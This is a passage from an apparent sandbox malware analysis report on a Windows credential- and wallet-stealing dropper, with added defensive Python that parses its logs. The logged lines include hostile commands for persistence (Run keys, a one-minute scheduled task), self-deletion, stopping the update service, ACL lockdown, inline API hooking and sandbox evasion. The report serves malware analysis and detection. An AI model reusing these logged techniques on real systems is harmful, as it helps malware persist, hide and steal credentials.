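    hdr_end = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    raw_ptr = -(-hdr_end // file_align) * file_align
    out = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew))
    out += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)   # AddressOfEntryPoint
    struct.pack_into("<I", opt, 64, checksum)    # CheckSum
    out += opt
    bodies = b""
    for name, vaddr, raw in sections:
        out += struct.pack("<8sIIIIIIHHI", name.encode("latin-1").ljust(8, b"\0"), len(raw), vaddr,
                           len(raw), raw_ptr + len(bodies), 0, 0, 0, 0, 0x60000020)
        bodies += raw
    return bytes(out + b"\0" * (raw_ptr - len(out)) + bodies)


if __name__ == "__main__":
    sample = build_test_pe([(".text", 0x1000, bytes(range(256)) * 4),
                            ("lB@dO\\ih", 0x2000, b"\0" * 512)], entry_rva=0x2010)
    print("\n".join(triage_pe(sample)))
```

Run against a real dropped file, `triage_pe(open(path, "rb").read())` yields the same three observations the report makes about the samples above: odd section names, a packed (near 8.0 entropy) section holding the entry point, and a checksum field that was never updated after the file was written.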

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File created: C:\ProgramData\61312899942613011832.exe
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\nppshell[1].exe
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe File created: C:\Users\user\Locktime\RtkAudUService64.exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe File created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe File created: C:\Users\user\AppData\Local\Temp\jekppnay.tmp
Source: C:\ProgramData\61312899942613011832.exe File created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe File created: C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe File created: C:\Users\user\1000018002\avicapn32.exe
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe File created: C:\Users\user\AppData\Local\Temp\advapi32.dll
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\avicapn32[1].exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\umciavi32[1].exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe File created: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\syncfiles[1].dll
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe File created: C:\Users\user\1000019012\syncfiles.dll
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\umciavi64[1].exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe File created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Emit64[1].exe
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File created: C:\ProgramData\61312899942613011832.exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi32.exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi64.exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run syncfiles.dll
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run syncfiles.dll
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run syncfiles.dll
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi64.exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi64.exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi32.exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi32.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
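Read together, the lines above describe a layered autostart: three HKCU Run values, a scheduled task that relaunches gntuud.exe every minute from a Temp directory, a rewritten Startup shell folder, and a stopped Update Orchestrator service (UsoSvc). The script below is an added example, not code from this report or from Joe Sandbox; it turns lines in this format into findings so the pattern can be scored automatically. The sample lines are copied from the report; the severity rules, the five-minute interval threshold and the notion that anything under a user profile or ProgramData is user-writable are assumptions of the example.

```python
import re

# Constructed sample: six lines copied from the Boot Survival block of this report.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi32.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi64.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run syncfiles.dll",
    r'Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F',
    r"Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup",
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc",
]

EVENT_RE = re.compile(r"^Source:\s+(?P<src>\S+)\s+(?P<event>Registry value created or modified|"
                      r"Key value created or modified|Process created):\s+(?P<rest>.*)$")
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')          # quoted or bare command-line tokens
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\s+(\S+)$", re.I)
SHELL_FOLDER_RE = re.compile(r"\\User Shell Folders\s+(\S+)$", re.I)
# Assumption: paths under a user profile or ProgramData are writable without admin rights.
USER_WRITABLE_RE = re.compile(r"^[a-z]:\\(users\\[^\\]+\\|programdata\\)", re.I)
MINUTES_PER = {"minute": 1, "hourly": 60, "daily": 1440}


def split_cmdline(cmd):
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmd)]


def parse_schtasks(tokens):
    """Name, command and interval in minutes of a 'schtasks /Create' line, else None."""
    low = [t.lower() for t in tokens]
    if "/create" not in low:
        return None
    opts = {}
    for i, t in enumerate(low):
        if t in ("/sc", "/mo", "/tn", "/tr") and i + 1 < len(tokens):
            opts[t] = tokens[i + 1]
    unit = MINUTES_PER.get(opts.get("/sc", "").lower())   # None for ONLOGON, ONSTART, ...
    try:
        interval = unit * int(opts.get("/mo", "1")) if unit else None
    except ValueError:
        interval = None
    return dict(name=opts.get("/tn"), run=opts.get("/tr"), interval_min=interval, force="/f" in low)


def triage_persistence(lines, max_interval_min=5):
    """One finding per autostart value, short-interval task, Startup redirect or stopped service."""
    findings = []
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue
        src, event, rest = m.group("src", "event", "rest")
        src_user = bool(USER_WRITABLE_RE.match(src))
        if event.startswith("Registry value"):
            rk = RUN_KEY_RE.search(rest)
            if rk:
                findings.append(dict(kind="run_key", value=rk.group(1), source=src,
                                     severity="high" if src_user else "medium"))
        elif event.startswith("Key value"):
            sf = SHELL_FOLDER_RE.search(rest)
            if sf and sf.group(1).lower() == "startup":
                findings.append(dict(kind="startup_folder_redirect", source=src, severity="high"))
        else:
            tokens = split_cmdline(rest)
            low = [t.lower() for t in tokens]
            exe = low[0].rsplit("\\", 1)[-1] if low else ""
            if exe == "schtasks.exe":
                task = parse_schtasks(tokens)
                if task and task["interval_min"] is not None and task["interval_min"] <= max_interval_min:
                    run_user = bool(USER_WRITABLE_RE.match(task["run"] or ""))
                    task.update(kind="scheduled_task", source=src, severity="high" if run_user else "medium")
                    findings.append(task)
            elif exe == "sc.exe" and "stop" in low and low.index("stop") + 1 < len(tokens):
                findings.append(dict(kind="service_stop", service=tokens[low.index("stop") + 1],
                                     source=src, severity="medium"))
    return findings


if __name__ == "__main__":
    for finding in triage_persistence(SAMPLE_LINES):
        print(finding)
```

The one-minute task is the detail worth keying on: a legitimate updater does not need to relaunch a binary from Temp every minute, and the /F flag means the task is silently replaced on every run, so the scheduler keeps it alive even after the Run values are cleaned.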

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Memory written: PID: 2508 base: 680005 value: E9 FB 99 26 77
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Memory written: PID: 2508 base: 778E9A00 value: E9 0A 66 D9 88
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Memory written: PID: 2508 base: 690007 value: E9 7B 4C 29 77
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Memory written: PID: 2508 base: 77924C80 value: E9 8E B3 D6 88
Source: C:\ProgramData\61312899942613011832.exe Memory written: PID: 5372 base: 660005 value: E9 FB 99 28 77
Source: C:\ProgramData\61312899942613011832.exe Memory written: PID: 5372 base: 778E9A00 value: E9 0A 66 D7 88
Source: C:\ProgramData\61312899942613011832.exe Memory written: PID: 5372 base: 670007 value: E9 7B 4C 2B 77
Source: C:\ProgramData\61312899942613011832.exe Memory written: PID: 5372 base: 77924C80 value: E9 8E B3 D4 88
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Memory written: PID: 5780 base: 15D0005 value: E9 FB 99 31 76
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Memory written: PID: 5780 base: 778E9A00 value: E9 0A 66 CE 89
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Memory written: PID: 5780 base: 15E0007 value: E9 7B 4C 34 76
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Memory written: PID: 5780 base: 77924C80 value: E9 8E B3 CB 89
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: DB0005 value: E9 FB 99 B3 76
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: 778E9A00 value: E9 0A 66 4C 89
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: DC0007 value: E9 7B 4C B6 76
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: 77924C80 value: E9 8E B3 49 89
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: F70005 value: E9 FB BF 94 76
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: 778BC000 value: E9 0A 40 6B 89
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: FA0008 value: E9 AB E0 95 76
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: 778FE0B0 value: E9 60 1F 6A 89
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: FB0005 value: E9 CB 5A 95 73
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: 74905AD0 value: E9 3A A5 6A 8C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: FC0005 value: E9 5B B0 96 73
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: 7492B060 value: E9 AA 4F 69 8C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: 1210005 value: E9 DB F8 A9 75
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: 76CAF8E0 value: E9 2A 07 56 8A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: 1220005 value: E9 FB 42 AB 75
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: 76CD4300 value: E9 0A BD 54 8A
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Memory written: PID: 4948 base: 1340005 value: E9 FB 99 5A 76
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Memory written: PID: 4948 base: 778E9A00 value: E9 0A 66 A5 89
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Memory written: PID: 4948 base: 1350007 value: E9 7B 4C 5D 76
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Memory written: PID: 4948 base: 77924C80 value: E9 8E B3 A2 89
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Memory written: PID: 3920 base: 7FFC32240008 value: E9 7B A9 EA FF
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Memory written: PID: 3920 base: 7FFC320EA980 value: E9 90 56 15 00
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Memory written: PID: 3920 base: 7FFC3225000D value: E9 6B 9B EC FF
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Memory written: PID: 3920 base: 7FFC32119B70 value: E9 AA 64 13 00
Source: C:\Users\user\1000018002\avicapn32.exe Memory written: PID: 1112 base: 1C70005 value: E9 FB 99 C7 75
Source: C:\Users\user\1000018002\avicapn32.exe Memory written: PID: 1112 base: 778E9A00 value: E9 0A 66 38 8A
Source: C:\Users\user\1000018002\avicapn32.exe Memory written: PID: 1112 base: 1C90007 value: E9 7B 4C C9 75
Source: C:\Users\user\1000018002\avicapn32.exe Memory written: PID: 1112 base: 77924C80 value: E9 8E B3 36 8A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 2820 base: FB0005 value: E9 FB 99 93 76
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 2820 base: 778E9A00 value: E9 0A 66 6C 89
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 2820 base: FC0007 value: E9 7B 4C 96 76
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 2820 base: 77924C80 value: E9 8E B3 69 89
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 2820 base: FD0005 value: E9 FB BF 8E 76
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 2820 base: 778BC000 value: E9 0A 40 71 89
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 2820 base: 1170008 value: E9 AB E0 78 76
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 2820 base: 778FE0B0 value: E9 60 1F 87 89
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 2820 base: 1180005 value: E9 CB 5A 78 73
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 2820 base: 74905AD0 value: E9 3A A5 87 8C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 2820 base: 1190005 value: E9 5B B0 79 73
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 2820 base: 7492B060 value: E9 AA 4F 86 8C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 2820 base: 11A0005 value: E9 DB F8 B0 75
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 2820 base: 76CAF8E0 value: E9 2A 07 4F 8A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 2820 base: 11B0005 value: E9 FB 42 B2 75
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 2820 base: 76CD4300 value: E9 0A BD 4D 8A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: 778BC000 value: 8B FF 55 8B EC
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: 74905AD0 value: 8B FF 55 8B EC
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: 7492B060 value: 8B FF 55 8B EC
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: 76CAF8E0 value: 8B FF 55 8B EC
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6128 base: 76CD4300 value: 8B FF 55 8B EC
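The "Memory written" entries above come in pairs, and each pair is one inline hook: a five-byte E9 rel32 jump is written at the entry of a library function (the 778xxxxx / 749xxxxx / 76Cxxxxx addresses, and the 7FFC... addresses in the 64-bit Emit64.exe process), and a second jump is written into a small stub in a low, privately allocated region that returns to the function just past the bytes the hook displaced. The later writes of 8B FF 55 8B EC (mov edi,edi / push ebp / mov ebp,esp, the hot-patchable prologue of 32-bit Windows API functions) put the original bytes back, which is what the "Overwrites code with function prologues" signature reacts to. The decoder below is an added example, not code from this report or from Joe Sandbox; it resolves each jump target (target = address + 5 + signed rel32) and pairs hooks with their trampolines. The sample lines are copied from the report; the pairing rule (of two jumps that land inside each other's write, the one landing fewer bytes past its partner is the trampoline) is an assumption that holds for every pair listed here.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: nine entries copied from the report (PID 2508 is DQxttu2Qrr.exe,
# 3920 is Emit64.exe, 6128 is the rundll32.exe that loaded cred64.dll).
SAMPLE_LINES = [
    "Memory written: PID: 2508 base: 680005 value: E9 FB 99 26 77",
    "Memory written: PID: 2508 base: 778E9A00 value: E9 0A 66 D9 88",
    "Memory written: PID: 2508 base: 690007 value: E9 7B 4C 29 77",
    "Memory written: PID: 2508 base: 77924C80 value: E9 8E B3 D6 88",
    "Memory written: PID: 3920 base: 7FFC32240008 value: E9 7B A9 EA FF",
    "Memory written: PID: 3920 base: 7FFC320EA980 value: E9 90 56 15 00",
    "Memory written: PID: 6128 base: F70005 value: E9 FB BF 94 76",
    "Memory written: PID: 6128 base: 778BC000 value: E9 0A 40 6B 89",
    "Memory written: PID: 6128 base: 778BC000 value: 8B FF 55 8B EC",
]

LINE_RE = re.compile(r"PID:\s*(\d+)\s+base:\s*([0-9A-Fa-f]+)\s+value:\s*((?:[0-9A-Fa-f]{2}\s*)+)")
JMP_REL32 = 0xE9
HOTPATCH_PROLOGUE = bytes.fromhex("8BFF558BEC")   # mov edi,edi; push ebp; mov ebp,esp
MAX_X86_INSN = 15                                 # longest x86 instruction: bounds the displaced bytes
PAIR_WINDOW = MAX_X86_INSN + 5                    # displaced bytes plus the 5-byte jmp that follows them


@dataclass
class MemWrite:
    pid: int
    addr: int
    data: bytes

    def jmp_target(self) -> Optional[int]:
        """Resolve 'E9 rel32': the target is the next instruction plus a signed 32-bit offset."""
        if len(self.data) < 5 or self.data[0] != JMP_REL32:
            return None
        return self.addr + 5 + int.from_bytes(self.data[1:5], "little", signed=True)


def parse_writes(lines):
    writes = []
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            writes.append(MemWrite(int(m.group(1)), int(m.group(2), 16),
                                   bytes.fromhex(m.group(3).replace(" ", ""))))
    return writes


def decode_hooks(lines):
    """Classify every write as hook (at the API), trampoline (in the stub),
    restore (original prologue written back) or an unpaired jmp."""
    writes = parse_writes(lines)
    events = []
    for i, w in enumerate(writes):
        target = w.jmp_target()
        if target is None:
            if w.data.startswith(HOTPATCH_PROLOGUE):
                events.append(dict(pid=w.pid, addr=w.addr, kind="restore", target=None, offset=0))
            continue
        kind, offset = "jmp", 0
        for j, other in enumerate(writes):
            if j == i or other.pid != w.pid or other.jmp_target() is None:
                continue
            here = target - other.addr              # how far past the other write our jump lands
            there = other.jmp_target() - w.addr     # how far past our write the other jump lands
            if 0 < here <= PAIR_WINDOW and 0 < there <= PAIR_WINDOW:
                # Assumption (true for every pair in this report): the stub's jump follows the
                # displaced bytes and returns to API+displaced, while the detour at the API lands
                # past that jump, so the write with the smaller landing offset is the trampoline.
                kind, offset = ("trampoline", here) if here < there else ("hook", here)
                break
        events.append(dict(pid=w.pid, addr=w.addr, kind=kind, target=target, offset=offset))
    return events


def describe(events):
    out = []
    for e in events:
        if e["kind"] == "hook":
            out.append(f"PID {e['pid']}: hook at {e['addr']:#x} detours to {e['target']:#x}")
        elif e["kind"] == "trampoline":
            out.append(f"PID {e['pid']}: trampoline at {e['addr']:#x} returns to {e['target']:#x} "
                       f"({e['offset']} displaced bytes)")
        elif e["kind"] == "restore":
            out.append(f"PID {e['pid']}: original prologue restored at {e['addr']:#x} (unhook)")
        else:
            out.append(f"PID {e['pid']}: unpaired jmp at {e['addr']:#x} -> {e['target']:#x}")
    return out


if __name__ == "__main__":
    print("\n".join(describe(decode_hooks(SAMPLE_LINES))))
```

Decoded this way, the first pair in PID 2508 reads: the trampoline at 0x680005 returns to 0x778E9A05 (five displaced bytes, the hot-patch prologue), and the hook at 0x778E9A00 detours to 0x68000F, ten bytes into the stub, right after the trampoline's own jump. The 7-byte and 8-byte variants (0x690007 and the 64-bit 0x7FFC32240008 stubs) show that the injector disassembles the prologue instead of assuming five bytes. Mapping the hooked addresses back to exported functions needs the module list from the same run, which this section does not include.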
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Module Loaded: C:\USERS\user\LOCKTIME\RTKAUDUSERVICE64.EXE
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\61312899942613011832.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000018002\avicapn32.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\1000018002\avicapn32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe System information queried: FirmwareTableInformation
Source: Emit64.exe, 0000001A.00000002.464895323.00000014243FC000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VCRUNTIME140.DLLSOFTOKN3.DLLNSS3.DLLMSVCP140.DLLMOZGLUE.DLLFREEBL3.DLL\SOFT\STEAM\\CONFIG\|UPDATEHTTPANALYZERSTDV7.EXEWIRESHARK.EXEHTTP ANALYZERCOMSTONESNOWBIGWALETS%S\%S\*%S\%S\%S%S\%S\%S\%S*.*EXODUS\EXODUS.WALLET*.JSONEXODUS\BACKUPS\EXODUS\BACKUPSHTTP200
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Special instruction interceptor: First address: 0000000001690363 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Special instruction interceptor: First address: 00000000015D656D instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\ProgramData\61312899942613011832.exe Special instruction interceptor: First address: 00000000017925FE instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Special instruction interceptor: First address: 0000000000A125FE instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Special instruction interceptor: First address: 00007FF676892A58 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Special instruction interceptor: First address: 00007FF676892A96 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\1000018002\avicapn32.exe Special instruction interceptor: First address: 00000000016299BA instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe RDTSC instruction interceptor: First address: 000000000176B0FE second address: 000000000176B10D instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 not dh 0x00000006 neg cl 0x00000008 mov dl, 15h 0x0000000a dec cl 0x0000000c sub ax, di 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe RDTSC instruction interceptor: First address: 00000000014D7B49 second address: 00000000014D7B51 instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 movzx ecx, si 0x00000006 inc ecx 0x00000007 pop eax 0x00000008 rdtsc
